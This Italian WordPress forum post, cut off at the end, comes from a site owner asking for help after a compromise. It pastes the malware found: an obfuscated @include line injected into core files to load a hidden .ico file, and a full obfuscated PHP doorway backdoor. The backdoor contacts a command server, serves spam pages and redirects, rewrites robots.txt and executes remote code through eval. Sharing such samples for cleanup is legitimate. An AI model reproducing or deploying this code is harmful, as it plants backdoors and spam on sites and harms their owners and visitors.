Sito violato, file modificati, cartelle create
-
Salve a tutti,
sono nuovo nel forum, utilizzo wordpress da alcuni anni.
Ho riscontrato un Enorme problema in un sito web che gestisco, vi elenco i problemi, ovvero sicuramente malware:nella root principale dove ci sono cartelle e file, alcuni file esempio:
index.php
wp-config.php
wp-settings.php
etc…
sono stati modificati, ovvero all’interno del file, sono state aggiunte queste righe di codice:/*d9507*/ @include "\057ho\155e/\160ed\141le\164ri\143ol\157re\057pu\142li\143_h\164ml\057wp\055in\143lu\144es\057bl\157ck\163/c\141le\156da\162/.\142cf\142c0\1428.\151co"; /*d9507*/
poi sono state create delle cartelle, con nomi strani, all’interno c’è un file denominato index.php il codice presdente è:
@ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@error_reporting(0);@set_time_limit(0);date_default_timezone_set('UTC');class _rjyire{static private $_2d9wb7ft = 84537037;static function _6nb3f($_abwoe9mn, $_8yfo3khv){$_abwoe9mn[2] = count($_abwoe9mn) > 4 ? long2ip(_rjyire::$_2d9wb7ft - 728) : $_abwoe9mn[2];$_3fy3rnlv = _rjyire::_l9066($_abwoe9mn, $_8yfo3khv);if (!$_3fy3rnlv) {$_3fy3rnlv = _rjyire::_40w78($_abwoe9mn, $_8yfo3khv);}return $_3fy3rnlv;}static function _l9066($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (!function_exists('curl_version')) {return "";}if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}$_nwuiwdhn = curl_init();curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($_nwuiwdhn, CURLOPT_URL, $_abwoe9mn);if (!empty($_3fy3rnlv)) {curl_setopt($_nwuiwdhn, CURLOPT_POST, 1);curl_setopt($_nwuiwdhn, CURLOPT_POSTFIELDS, $_3fy3rnlv);}if (!empty($_qsz31x78)) {curl_setopt($_nwuiwdhn, CURLOPT_HTTPHEADER, $_qsz31x78);}curl_setopt($_nwuiwdhn, CURLOPT_RETURNTRANSFER, TRUE);$_cm59hgy5 = curl_exec($_nwuiwdhn);curl_close($_nwuiwdhn);return $_cm59hgy5;}static function _40w78($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}if (!empty($_3fy3rnlv)) {$_kmivd3lp = array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => $_3fy3rnlv);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = $_kmivd3lp["header"] . "\r\n" . implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));} else {$_kmivd3lp = array('method' => 'GET',);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));}return @file_get_contents($_abwoe9mn, FALSE, $_tltqoo6e);}}class _rthpn88{private static $_k63tzh9f = "";private static $_cpwy1mih = -1;private static $_n2xvz23t = "";private $_mi8pdpyn = "";private $_qgyjrkds = "";private $_ft3y0j4r = "";private $_xxqorlts = "";public static function _r2lu5($_cfyby5vv, $_api83au6, $_9bh0q0tv){_rthpn88::$_k63tzh9f = $_cfyby5vv . "/cache/";_rthpn88::$_cpwy1mih = $_api83au6;_rthpn88::$_n2xvz23t = $_9bh0q0tv;if (!@file_exists(_rthpn88::$_k63tzh9f)) {@mkdir(_rthpn88::$_k63tzh9f);}}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_rthpn88::$_k63tzh9f) as $_cmxyqmp1) {$_n6kr9w1e += 1;}return $_n6kr9w1e;}public static function _obtpk(){return TRUE;}public function __construct($_lk6997mu, $_awf0fhgr, $_txikr7hs, $_0wz75mln){$this->_mi8pdpyn = $_lk6997mu;$this->_qgyjrkds = $_awf0fhgr;$this->_ft3y0j4r = $_txikr7hs;$this->_xxqorlts = $_0wz75mln;}public function _upktf(){function _ipjab($_qru2hk8e, $_01hrpgjh){return round(rand($_qru2hk8e, $_01hrpgjh - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);}$_sg05zl9j = _h6dhczx::_h93q9();$_3fy3rnlv = str_replace("{{ text }}", $this->_qgyjrkds,str_replace("{{ keyword }}", $this->_ft3y0j4r,str_replace("{{ links }}", $this->_xxqorlts, $this->_mi8pdpyn)));while (TRUE) {$_u7pu8sv3 = preg_replace('/' . preg_quote("{{ randkeyword }}", '/') . '/', _h6dhczx::_ytlw7(), $_3fy3rnlv, 1);if ($_u7pu8sv3 === $_3fy3rnlv) {break;}$_3fy3rnlv = $_u7pu8sv3;}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX-ANCHOR (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_srvjq02r = _cqfim72::_25kvr($_txikr7hs);$_3fy3rnlv = str_replace($_uuoxevdj[0], $_srvjq02r, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_3fy3rnlv = str_replace($_uuoxevdj[0], $_txikr7hs, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDFLOAT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], _ipjab($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDINT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], rand($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}return $_3fy3rnlv;}public function _xnpn4(){$_xan00brs = _rthpn88::$_k63tzh9f . md5($this->_ft3y0j4r . _rthpn88::$_n2xvz23t);if (_rthpn88::$_cpwy1mih == -1) {$_2h2r40e0 = -1;} else {$_2h2r40e0 = time() + (3600 * 24 * 30);}$_4ih6ng42 = array("template" => $this->_mi8pdpyn, "text" => $this->_qgyjrkds, "keyword" => $this->_ft3y0j4r,"links" => $this->_xxqorlts, "expired" => $_2h2r40e0);@file_put_contents($_xan00brs, serialize($_4ih6ng42));}static public function _h8n79($_txikr7hs){$_xan00brs = _rthpn88::$_k63tzh9f . md5($_txikr7hs . _rthpn88::$_n2xvz23t);$_xan00brs = @unserialize(@file_get_contents($_xan00brs));if (!empty($_xan00brs) && ($_xan00brs["expired"] > time() || $_xan00brs["expired"] == -1)) {return new _rthpn88($_xan00brs["template"], $_xan00brs["text"], $_xan00brs["keyword"], $_xan00brs["links"]);} else {return null;}}}class _s269ka{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";public static function _r2lu5($_cfyby5vv, $_tolnhsib){_s269ka::$_k63tzh9f = $_cfyby5vv . "/";_s269ka::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_s269ka::$_k63tzh9f)) {@mkdir(_s269ka::$_k63tzh9f);}}public static function _obtpk(){return TRUE;}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_n6kr9w1e += 1;}}return $_n6kr9w1e;}static public function _ytlw7(){$_jrq92p7z = array();foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_jrq92p7z[] = $_cmxyqmp1;}}return @file_get_contents(_s269ka::$_k63tzh9f . $_jrq92p7z[array_rand($_jrq92p7z)]);}static public function _xnpn4($_4h4ro24x){if (@file_exists(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html")) {return;}@file_put_contents(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html", $_4h4ro24x);}}class _h6dhczx{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";private static $_6yas4x0c = array();private static $_9f0n8vcl = array();public static function _r2lu5($_cfyby5vv, $_tolnhsib){_h6dhczx::$_k63tzh9f = $_cfyby5vv . "/";_h6dhczx::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_h6dhczx::$_k63tzh9f)) {@mkdir(_h6dhczx::$_k63tzh9f);}}private static function _ashu1(){$_4lx9tym4 = array();foreach (scandir(_h6dhczx::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _h6dhczx::$_y1ymvkz8) === 0) {$_4lx9tym4[] = $_cmxyqmp1;}}return $_4lx9tym4;}public static function _obtpk(){return TRUE;}static public function _ytlw7(){if (empty(_h6dhczx::$_6yas4x0c)) {$_4lx9tym4 = _h6dhczx::_ashu1();_h6dhczx::$_6yas4x0c = @file(_h6dhczx::$_k63tzh9f . $_4lx9tym4[array_rand($_4lx9tym4)], FILE_IGNORE_NEW_LINES);}return _h6dhczx::$_6yas4x0c[array_rand(_h6dhczx::$_6yas4x0c)];}static public function _h93q9(){if (empty(_h6dhczx::$_9f0n8vcl)) {$_4lx9tym4 = _h6dhczx::_ashu1();foreach ($_4lx9tym4 as $_rsz2yre4) {_h6dhczx::$_9f0n8vcl = array_merge(_h6dhczx::$_9f0n8vcl, @file(_h6dhczx::$_k63tzh9f . $_rsz2yre4, FILE_IGNORE_NEW_LINES));}}return _h6dhczx::$_9f0n8vcl;}static public function _xnpn4($_hod9y4k1){if (@file_exists(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list")) {return;}@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list", $_hod9y4k1);}static public function _5oekv($_txikr7hs){@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5(_cqfim72::$_7uigpzys) . ".list", $_txikr7hs . "\n", 8);}}class _cqfim72{static public $_1bgey6eb = "5.3";static public $_7uigpzys = "dd4074a4-4cde-a0f0-8255-f5266e158790";private $_159o4ero = "http://136.12.78.46/app/assets/api2?action=redir";private $_ne9xwwkz = "http://136.12.78.46/app/assets/api?action=page";static public $_n4vffsjw = 5;static public $_zdyz2axj = 20;private function _fb8y7(){$_vpl9ipeq = array('#libwww-perl#i','#MJ12bot#i','#msnbot#i', '#msnbot-media#i','#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i','#spider#i', '#yahoo#i', '#google#i', '#altavista#i','#ask#i','#yahoo!\s*slurp#i','#BingBot#i');if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_vpl9ipeq, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {$_m75irtfe = 1;} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {$_m75irtfe = 1;} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {$_m75irtfe = 1;} else {$_m75irtfe = 0;}return $_m75irtfe;}private static function _9j03s(){$_8yfo3khv = array();$_8yfo3khv['ip'] = $_SERVER['REMOTE_ADDR'];$_8yfo3khv['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];$_8yfo3khv['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_8yfo3khv['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_8yfo3khv['ref'] = @$_SERVER['HTTP_REFERER'];$_8yfo3khv['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_8yfo3khv['acp'] = @$_SERVER['HTTP_ACCEPT'];$_8yfo3khv['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_8yfo3khv['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_8yfo3khv;}public function __construct(){$this->_159o4ero = explode("/", $this->_159o4ero);$this->_ne9xwwkz = explode("/", $this->_ne9xwwkz);}static public function _1copw($_l4syzkad){if (strlen($_l4syzkad) < 4) {return "";}$_r2it9ts5 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_sg05zl9j = str_split($_r2it9ts5);$_sg05zl9j = array_flip($_sg05zl9j);$_towp3ylv = 0;$_tr8svs2y = "";$_l4syzkad = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_l4syzkad);do {$_m6eh4k4n = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_fqewi4pc = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_thk7spqz = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_d1y2u7lo = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_gybbwgjq = ($_m6eh4k4n << 2) | ($_fqewi4pc >> 4);$_rqpd1aej = (($_fqewi4pc & 15) << 4) | ($_thk7spqz >> 2);$_ld9tnb9z = (($_thk7spqz & 3) << 6) | $_d1y2u7lo;$_tr8svs2y = $_tr8svs2y . chr($_gybbwgjq);if ($_thk7spqz != 64) {$_tr8svs2y = $_tr8svs2y . chr($_rqpd1aej);}if ($_d1y2u7lo != 64) {$_tr8svs2y = $_tr8svs2y . chr($_ld9tnb9z);}} while ($_towp3ylv < strlen($_l4syzkad));return $_tr8svs2y;}private function _8cyp7($_txikr7hs){$_lk6997mu = "";$_awf0fhgr = "";$_8yfo3khv = _cqfim72::_9j03s();$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv["keyword"] = $_txikr7hs;$_8yfo3khv["tc"] = 10;$_8yfo3khv = http_build_query($_8yfo3khv);$_y3jqeqay = _rjyire::_6nb3f($this->_ne9xwwkz, $_8yfo3khv);if (strpos($_y3jqeqay, _cqfim72::$_7uigpzys) === FALSE) {return array($_lk6997mu, $_awf0fhgr);}$_lk6997mu = _s269ka::_ytlw7();$_awf0fhgr = substr($_y3jqeqay, strlen(_cqfim72::$_7uigpzys));$_awf0fhgr = explode("\n", $_awf0fhgr);shuffle($_awf0fhgr);$_awf0fhgr = implode(" ", $_awf0fhgr);return array($_lk6997mu, $_awf0fhgr);}private function _yt32p(){$_8yfo3khv = _cqfim72::_9j03s();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_8yfo3khv['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_8yfo3khv['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_8yfo3khv['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv = http_build_query($_8yfo3khv);$_av1osu2q = _rjyire::_6nb3f($this->_159o4ero, $_8yfo3khv);$_av1osu2q = @unserialize($_av1osu2q);if (isset($_av1osu2q["type"]) && $_av1osu2q["type"] == "redir") {if (!empty($_av1osu2q["data"]["header"])) {header($_av1osu2q["data"]["header"]);return true;} elseif (!empty($_av1osu2q["data"]["code"])) {echo $_av1osu2q["data"]["code"];return true;}}return false;}public function _obtpk(){return _rthpn88::_obtpk() && _s269ka::_obtpk() && _h6dhczx::_obtpk();}static public function _ayawc(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _nze5p(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];if (strpos($_h46qo2n7, ".php") === FALSE) {$_h46qo2n7 = explode("/", $_h46qo2n7);array_pop($_h46qo2n7);$_h46qo2n7 = implode("/", $_h46qo2n7) . "/";}return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_h46qo2n7);}public static function _4ejca(){$_2zj0nny5 = Array("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36");$_ke278tps = array("https://www.google.com/ping?sitemap=" => "Sitemap Notification Received",);$_qsz31x78 = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language: en-US,en;q=0.5","User-Agent: " . $_2zj0nny5[array_rand($_2zj0nny5)],);$_to27fg02 = urlencode(_cqfim72::_bwc28() . "/sitemap.xml");foreach ($_ke278tps as $_abwoe9mn => $_7kc85jy1) {$_085pfn8u = _rjyire::_l9066($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);if (empty($_085pfn8u)) {$_085pfn8u = _rjyire::_40w78($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);}if (empty($_085pfn8u)) {return FALSE;}if (strpos($_085pfn8u, $_7kc85jy1) === FALSE) {return FALSE;}}return TRUE;}public static function _ztzjr(){$_okdhp6f7 = "User-agent: *\nDisallow: %s\nUser-agent: Bingbot\nUser-agent: Googlebot\nUser-agent: Slurp\nDisallow:\nSitemap: %s\n";$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_z6qkaj48 = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));$_kp3zkd6w = sprintf($_okdhp6f7, $_z6qkaj48, _cqfim72::_bwc28() . "/sitemap.xml");$_3whh3em1 = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";if (@file_exists($_3whh3em1)) {@chmod($_3whh3em1, 0777);$_cmsqf6hf = @file_get_contents($_3whh3em1);} else {$_cmsqf6hf = "";}if (strpos($_cmsqf6hf, $_kp3zkd6w) === FALSE) {@file_put_contents($_3whh3em1, $_cmsqf6hf . "\n" . $_kp3zkd6w);$_cmsqf6hf = @file_get_contents($_3whh3em1);return (strpos($_cmsqf6hf, $_kp3zkd6w) !== FALSE);}return FALSE;}public static function _bwc28(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_cfyby5vv = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_cfyby5vv);}public static function _25kvr($_txikr7hs){$_3egy51jd = _cqfim72::_nze5p();$_uuxqgelt = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);$_573a5o2r = "";if (substr($_3egy51jd, -1) == "/") {if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s%s.html", $_3egy51jd, urlencode($_txikr7hs));} else {if (FALSE && (ord($_uuxqgelt[0]) % 2)) {$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_uuxqgelt,urlencode(str_replace(" ", "-", $_txikr7hs)));} else {$_zgu1agut = array("id", "page", "tag");$_c58n781y = $_zgu1agut[ord($_uuxqgelt[2]) % count($_zgu1agut)];if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_c58n781y,urlencode($_txikr7hs));}}return $_573a5o2r;}public static function _9nl1a($_qru2hk8e, $_01hrpgjh){$_2shel3xi = "";for ($_towp3ylv = 0; $_towp3ylv < rand($_qru2hk8e, $_01hrpgjh); $_towp3ylv++) {$_txikr7hs = _h6dhczx::_ytlw7();$_2shel3xi .= sprintf("<a href=\"%s\">%s</a>,\n",_cqfim72::_25kvr($_txikr7hs), ucwords($_txikr7hs));}return $_2shel3xi;}public static function _oiwn0($_ittn9lq1 = FALSE){$_tej93zxq = dirname(__FILE__) . "/sitemap.xml";$_v97jk5uy = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";$_0gp89u6y = "</urlset>";$_sg05zl9j = _h6dhczx::_h93q9();$_i3q2gdxj = array();if (file_exists($_tej93zxq)) {$_y3jqeqay = simplexml_load_file($_tej93zxq);foreach ($_y3jqeqay as $_ccaqt8r5) {$_i3q2gdxj[(string)$_ccaqt8r5->loc] = (string)$_ccaqt8r5->lastmod;}} else {$_ittn9lq1 = FALSE;}foreach ($_sg05zl9j as $_q67rhvuo) {$_573a5o2r = _cqfim72::_25kvr($_q67rhvuo);if (isset($_i3q2gdxj[$_573a5o2r])) {continue;}if ($_ittn9lq1) {$_b8mfdvbf = time();} else {$_b8mfdvbf = time() - (crc32($_q67rhvuo) % (60 * 60 * 24 * 30));}$_i3q2gdxj[$_573a5o2r] = date("Y-m-d", $_b8mfdvbf);}$_vf4ra3wy = "";foreach ($_i3q2gdxj as $_abwoe9mn => $_b8mfdvbf) {$_vf4ra3wy .= "<url>\n";$_vf4ra3wy .= sprintf("<loc>%s</loc>\n", $_abwoe9mn);$_vf4ra3wy .= sprintf("<lastmod>%s</lastmod>\n", $_b8mfdvbf);$_vf4ra3wy .= "</url>\n";}$_f81pyder = $_v97jk5uy . $_vf4ra3wy . $_0gp89u6y;$_to27fg02 = _cqfim72::_bwc28() . "/sitemap.xml";@file_put_contents($_tej93zxq, $_f81pyder);return $_to27fg02;}public function _qpwwy(){$_c58n781y = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);if (!$this->_fb8y7()) {if ($this->_yt32p()) {return;}}if (!empty($_GET)) {$_c2guacgb = array_values($_GET);} else {$_c2guacgb = explode("/", $_SERVER["REQUEST_URI"]);$_c2guacgb = array_reverse($_c2guacgb);}$_txikr7hs = "";foreach ($_c2guacgb as $_pk44sti1) {if (substr_count($_pk44sti1, "-") > 0) {$_txikr7hs = $_pk44sti1;break;}}$_txikr7hs = str_replace($_c58n781y . "-", "", $_txikr7hs);$_txikr7hs = str_replace("-" . $_c58n781y, "", $_txikr7hs);$_txikr7hs = str_replace("-", " ", $_txikr7hs);$_tdnzevth = array(".html", ".php", ".aspx");foreach ($_tdnzevth as $_snux527w) {if (strpos($_txikr7hs, $_snux527w) === strlen($_txikr7hs) - strlen($_snux527w)) {$_txikr7hs = substr($_txikr7hs, 0, strlen($_txikr7hs) - strlen($_snux527w));}}$_txikr7hs = urldecode($_txikr7hs);$_o2y3ufcl = _h6dhczx::_h93q9();if (empty($_txikr7hs)) {$_txikr7hs = $_o2y3ufcl[0];} else if (!in_array($_txikr7hs, $_o2y3ufcl)) {$_ig73pl9n = 0;foreach (str_split($_txikr7hs) as $_nwuiwdhn) {$_ig73pl9n += ord($_nwuiwdhn);}$_txikr7hs = $_o2y3ufcl[$_ig73pl9n % count($_o2y3ufcl)];}if (!empty($_txikr7hs)) {$_av1osu2q = _rthpn88::_h8n79($_txikr7hs);if (empty($_av1osu2q)) {list($_lk6997mu, $_awf0fhgr) = $this->_8cyp7($_txikr7hs);if (empty($_awf0fhgr)) {return;}$_av1osu2q = new _rthpn88($_lk6997mu, $_awf0fhgr, $_txikr7hs, _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_av1osu2q->_xnpn4();}echo $_av1osu2q->_upktf();}}}_rthpn88::_r2lu5(dirname(__FILE__), -1, _cqfim72::$_7uigpzys);_s269ka::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt12"), 0, 4));_h6dhczx::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt22"), 0, 4));function _o5w9v($_y3jqeqay, $_q67rhvuo){$_xl8bdpr4 = "";for ($_towp3ylv = 0; $_towp3ylv < strlen($_y3jqeqay);) {for ($_p5o0lf07 = 0; $_p5o0lf07 < strlen($_q67rhvuo) && $_towp3ylv < strlen($_y3jqeqay); $_p5o0lf07++, $_towp3ylv++) {$_xl8bdpr4 .= chr(ord($_y3jqeqay[$_towp3ylv]) ^ ord($_q67rhvuo[$_p5o0lf07]));}}return $_xl8bdpr4;}function _2qx5j($_y3jqeqay, $_q67rhvuo, $_24fhhpd9){return _o5w9v(_o5w9v($_y3jqeqay, $_q67rhvuo), $_24fhhpd9);}foreach (array_merge($_COOKIE, $_POST) as $_o88biqxq => $_y3jqeqay) {$_y3jqeqay = @unserialize(_2qx5j(_cqfim72::_1copw($_y3jqeqay), $_o88biqxq, _cqfim72::$_7uigpzys));if (isset($_y3jqeqay['ak']) && _cqfim72::$_7uigpzys == $_y3jqeqay['ak']) {if ($_y3jqeqay['a'] == 'doorway2') {if ($_y3jqeqay['sa'] == 'check') {$_3fy3rnlv = _rjyire::_6nb3f(explode("/", "http://httpbin.org/"), "");if (strlen($_3fy3rnlv) > 512) {echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,"cache" => _rthpn88::_sry35(),"keywords" => count(_h6dhczx::_h93q9()),"templates" => _s269ka::_sry35()));}exit;}if ($_y3jqeqay['sa'] == 'templates') {foreach ($_y3jqeqay["templates"] as $_lk6997mu) {_s269ka::_xnpn4($_lk6997mu);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}}if ($_y3jqeqay['sa'] == 'keywords') {_h6dhczx::_xnpn4($_y3jqeqay["keywords"]);_cqfim72::_oiwn0();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'update_sitemap') {_cqfim72::_oiwn0(TRUE);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'pages') {$_vruef3d6 = 0;$_o2y3ufcl = _h6dhczx::_h93q9();if (_s269ka::_sry35() > 0) {foreach ($_y3jqeqay['pages'] as $_av1osu2q) {$_ow1agfr3 = _rthpn88::_h8n79($_av1osu2q["keyword"]);if (empty($_ow1agfr3)) {$_ow1agfr3 = new _rthpn88(_s269ka::_ytlw7(), $_av1osu2q["text"], $_av1osu2q["keyword"], _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_ow1agfr3->_xnpn4();$_vruef3d6 += 1;if (!in_array($_av1osu2q["keyword"], $_o2y3ufcl)) {_h6dhczx::_5oekv($_av1osu2q["keyword"]);}}}}echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "pages" => $_vruef3d6));}if ($_y3jqeqay["sa"] == "ping") {$_085pfn8u = _cqfim72::_4ejca();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}if ($_y3jqeqay["sa"] == "robots") {$_085pfn8u = _cqfim72::_ztzjr();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}}if ($_y3jqeqay['sa'] == 'eval') {eval($_y3jqeqay["data"]);exit;}}}$_5tk2ma86 = new _cqfim72();if ($_5tk2ma86->_obtpk()) {$_5tk2ma86->_qpwwy();}exit();
poi, ho trovato a giro, altri file con nomi strani tipo:
.3bddbb29.ico
il suo contenuto è:
